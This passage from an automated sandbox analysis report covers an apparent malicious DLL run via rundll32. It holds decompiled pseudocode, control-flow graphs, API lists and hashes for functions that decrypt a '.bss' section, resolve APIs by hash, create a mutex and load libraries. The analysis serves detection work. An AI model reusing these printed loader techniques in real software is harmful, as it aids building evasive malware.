                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 223 180004f1c-180004f57 HeapCreate 224 18000506b-18000508b 223->224 225 180004f5d-180004f73 223->225 226 180004f79-180004f7e 225->226 227 180004ffc 225->227 229 180004f8a-180004f8c 226->229 230 180004f80-180004f88 226->230 228 180005001-180005003 227->228 232 180005005-18000500e HeapDestroy 228->232 233 180005010-180005037 HeapAlloc 228->233 229->227 231 180004f8e-180004fb1 HeapAlloc 229->231 230->226 230->229 234 180004fb3-180004ff3 call 180002524 call 180001b48 231->234 235 180004ff5-180004ffa 231->235 232->224 236 180005049-180005064 call 18000236a call 18000508c 233->236 237 180005039-180005047 HeapDestroy 233->237 234->228 235->228 244 180005069 236->244 237->224 244->224
                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 246 180001000-180001057 CreateFileW 247 1800010c8-1800010ce GetLastError 246->247 248 180001059-180001068 GetFileSize 246->248 251 1800010d0-1800010d4 247->251 249 180001071-180001086 HeapAlloc 248->249 250 18000106a-18000106f 248->250 249->247 252 180001088-1800010a7 ReadFile 249->252 250->251 253 1800010d6-1800010d9 CloseHandle 251->253 254 1800010df-1800010e2 251->254 252->247 257 1800010a9-1800010b0 252->257 253->254 255 1800010e4-1800010e6 254->255 256 1800010f6-18000110e 254->256 255->256 258 1800010e8-1800010f0 HeapFree 255->258 259 1800010b2-1800010b7 257->259 260 1800010b9-1800010c6 257->260 258->256 259->251 260->251
                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CreateThread.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002715
                  • FindCloseChangeNotification.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocChangeCloseCreateErrorFindFreeLastNotificationThreadlstrcpylstrlen
                  • String ID:
                  • API String ID: 855867372-0
                  • Opcode ID: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				CloseHandle(??);
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocCloseCreateFreeHandleMutexlstrlen
                  • String ID:
                  • API String ID: 3861850634-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 180006008-180006063 lstrlenA RtlAllocateHeap 378 180006069-1800060c5 _snprintf 377->378 379 1800060eb-180006107 377->379 380 1800060e5-1800060e7 378->380 381 1800060c7-1800060ca 378->381 380->379 382 1800060d4-1800060e3 lstrcpyA 381->382 383 1800060cc-1800060d0 381->383 382->379 383->382
                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2809993405-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 384 180007b94-180007be5 385 180007da3 384->385 386 180007beb-180007bf3 384->386 388 180007da8-180007db8 385->388 386->385 387 180007bf9-180007c24 RtlAllocateHeap 386->387 389 180007c2a-180007c63 memset 387->389 390 180007d9c-180007da1 387->390 391 180007c69-180007c93 389->391 392 180007d6d-180007d85 389->392 390->388 394 180007c98-180007c9b 391->394 395 180007d87-180007d8a 392->395 396 180007d8c-180007d9a HeapFree 392->396 394->392 397 180007ca1-180007caa 394->397 395->388 396->388 398 180007cd6-180007ce7 397->398 399 180007cac-180007cd1 call 180008c48 397->399 401 180007ce9-180007ced 398->401 402 180007d1d-180007d68 398->402 399->398 404 180007cfa-180007d02 401->404 405 180007cef-180007cf8 401->405 402->394 406 180007d07-180007d0e 404->406 405->406 406->401 407 180007d10-180007d18 406->407 407->402
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 408 18000702c-180007056 call 18000459c 411 180007074 408->411 412 180007058-180007068 408->412 413 180007076-180007078 411->413 414 180007072 412->414 415 18000707a-18000708b call 18000459c 413->415 416 1800070ce-1800070d4 GetLastError 413->416 414->413 422 18000708d-18000709c 415->422 423 18000709e 415->423 418 1800070d6-1800070d8 416->418 420 1800070e9-1800070fa 418->420 421 1800070da-1800070e7 call 180004cfc 418->421 421->420 426 1800070a0-1800070a2 422->426 423->426 427 1800070a4-1800070a6 426->427 428 1800070a8-1800070ae GetLastError 426->428 430 1800070b0-1800070c1 call 18000459c 427->430 428->430 430->418 433 1800070c3-1800070cc 430->433 433->418
                  C-Code - Quality: 40%
                  			E0000000118000702C(void* __ebx, long long* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				intOrPtr _v24;
                  				long long* _t42;
                  
                  				_t42 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				_t53 =  *0x8000d4a0;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t42 == 0) goto 0x80007074;
                  				r9d = 1;
                  				r8d = 0;
                  				_v24 = 0xf0000040;
                  				 *_t42(); // executed
                  				goto 0x80007076;
                  				if (0 == 0) goto 0x800070ce;
                  				E0000000118000459C(0xc506923c, _t42,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t42 == 0) goto 0x8000709e;
                  				 *_t42();
                  				goto 0x800070a0;
                  				if (0 == 0) goto 0x800070a8;
                  				goto 0x800070b0;
                  				GetLastError();
                  				E0000000118000459C(0xbaca8f4d, _t42,  *((intOrPtr*)(_t53 + 0x20)));
                  				if (_t42 == 0) goto 0x800070d6;
                  				 *_t42();
                  				goto 0x800070d6;
                  				if (GetLastError() == 0) goto 0x800070e9;
                  				return E00000001180004CFC(4, __rbx, __rcx);
                  			}





                  0x18000702c
                  0x18000702c
                  0x180007031
                  0x18000703b
                  0x18000704e
                  0x180007056
                  0x18000705d
                  0x180007063
                  0x180007068
                  0x180007070
                  0x180007072
                  0x180007078
                  0x180007083
                  0x18000708b
                  0x18000709a
                  0x18000709c
                  0x1800070a2
                  0x1800070a6
                  0x1800070a8
                  0x1800070b9
                  0x1800070c1
                  0x1800070ca
                  0x1800070cc
                  0x1800070d8
                  0x1800070fa

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID: @
                  • API String ID: 1452528299-2766056989
                  • Opcode ID: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
                  • Instruction ID: ac7bd9da6f2b9285d8b03cb53e6a872d64b1fe26a18dfc81d45ef4acb4719aca
                  • Opcode Fuzzy Hash: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
                  • Instruction Fuzzy Hash: FD214D71704B5982FAA2D7A5A4403AA7290ABDC7C0F14C621AE4D87B8ADE6CCA098715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 435 180002464-180002482 LoadLibraryA 436 180002484-180002495 call 180007b94 435->436 437 1800024af-1800024b5 GetLastError 435->437 441 1800024a4-1800024ad FreeLibrary 436->441 442 180002497-1800024a2 436->442 439 1800024b7-1800024c8 437->439 441->439 442->439
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E00000001180003798(signed int __ecx, long long* __rax, long long __rbx, intOrPtr* __rcx, signed int __rdx, void* __r8) {
                  				signed int _t45;
                  				intOrPtr _t52;
                  				void* _t65;
                  				long long* _t68;
                  				signed long long _t72;
                  				void* _t85;
                  				void* _t87;
                  				long long _t89;
                  				void* _t92;
                  				void* _t93;
                  				void* _t99;
                  				void* _t102;
                  				void* _t103;
                  				void* _t105;
                  				void* _t108;
                  
                  				_t68 = __rax;
                  				_t45 = __ecx;
                  				_t99 = _t92;
                  				 *((long long*)(_t99 + 0x10)) = __rbx;
                  				 *((long long*)(_t99 + 0x18)) = _t89;
                  				_t93 = _t92 - 0x40;
